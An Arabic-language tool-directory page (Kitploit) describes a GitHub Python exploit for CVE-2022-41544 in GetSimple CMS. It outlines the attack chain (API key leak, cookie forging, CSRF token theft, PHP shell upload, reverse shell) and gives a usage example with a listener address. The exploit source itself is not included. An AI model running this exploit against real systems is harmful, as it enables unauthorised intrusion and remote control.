Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-41544 — نص استغلال Python لـ CVE-2022-41544 في GetSimple CMS. يؤتمت تسريب مفاتيح API، واستخراج رموز CSRF، وتحميل قشرة PHP، وتشغيل الصدفة العكسية لاختبار الاختراق. | Kitploit
أدوات/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

نص استغلال Python لـ CVE-2022-41544 في GetSimple CMS. يؤتمت تسريب مفاتيح API، واستخراج رموز CSRF، وتحميل قشرة PHP، وتشغيل الصدفة العكسية لاختبار الاختراق.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سكريبت استغلال CVE-2022-41544

يحتوي هذا المستودع على سكريبت لاستغلال ثغرة CVE-2022-41544 في نظام GetSimple CMS. يقوم السكريبت بعدة خطوات للتحقق من وجود الثغرات، تسريب مفاتيح API، تعيين ملفات تعريف الارتباط (cookies)، الحصول على رمز CSRF، رفع shell، وتفعيل shell.

التغييرات والتحسينات

  1. التعامل مع تحذيرات الإهمال: تمت إزالة استيراد telnetlib القديم حيث أنه لم يكن ضروريًا لوظيفة السكريبت.
  2. تحسين معالجة الأخطاء: تمت إضافة معالجة أكثر قوة للأخطاء لطلبات HTTP وتحليل XML.
  3. تحسين ملاحظات المستخدم: تم توفير ملاحظات مفصلة لكل خطوة لمساعدة المستخدمين على فهم تقدم السكريبت وأي مشاكل تمت مواجهتها.
  4. التحقق من الإدخال: تم التأكد من صحة إدخالات المستخدم للهدف والمسار وبيانات الاعتماد.
  5. التوثيق والتعليقات: تمت إضافة تعليقات وتوثيق لتحسين قراءة الكود وسهولة الاستخدام.

الاستخدام

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. تثبيت التبعيات: تأكد من تثبيت Python 3 بالإضافة إلى مكتبة requests.

root@kitploit:~
pip3 install requests
  • تشغيل السكريبت:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>: النطاق الهدف أو عنوان IP.
    • <path>: المسار إلى تثبيت GetSimple CMS.
    • <ip:port>: عنوان IP والمنفذ للـ shell العكسي.
    • <username>: اسم المستخدم المسؤول لنظام GetSimple CMS.

    مثال:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    
  • image

    image

    نظرة عامة على السكريبت

    الدوال

    • print_the_banner(): يعرض لافتة مزخرفة باستخدام فن ASCII.
    • get_version(target, path): يتحقق مما إذا كان إصدار GetSimple CMS الهدف معرضًا للخطر.
    • api_leak(target, path): يحاول استرداد مفتاح API من ملف XML للترخيص.
    • set_cookies(username, version, apikey): يعيّن ملفات تعريف الارتباط المطلوبة للطلبات اللاحقة بناءً على مفتاح API المسترد.
    • get_csrf_token(target, path, headers): يستخرج رمز CSRF اللازم لرفع shell.
    • upload_shell(target, path, headers, nonce, shell_content): يقوم برفع PHP shell إلى الخادم الهدف.
    • shell_trigger(target, path): يفعل shell المرفوع لإنشاء اتصال shell عكسي.

    الدالة الرئيسية

    تقوم الدالة main() بتنسيق العملية بأكملها عن طريق استدعاء الدوال المذكورة أعلاه بالتسلسل لاستغلال ثغرة CVE-2022-41544.

    المؤلف

    تم تطوير هذا السكريبت بواسطة h3x0v3rl0rd.

    إخلاء مسؤولية

    هذا السكريبت مُقدم لأغراض تعليمية فقط. الوصول غير المصرح به إلى الأنظمة غير قانوني وغير أخلاقي. استخدم هذا السكريبت بمسؤولية وفقط على الأنظمة التي لديك إذن صريح باختبارها.

    الترخيص

    هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

    تنزيل الأداة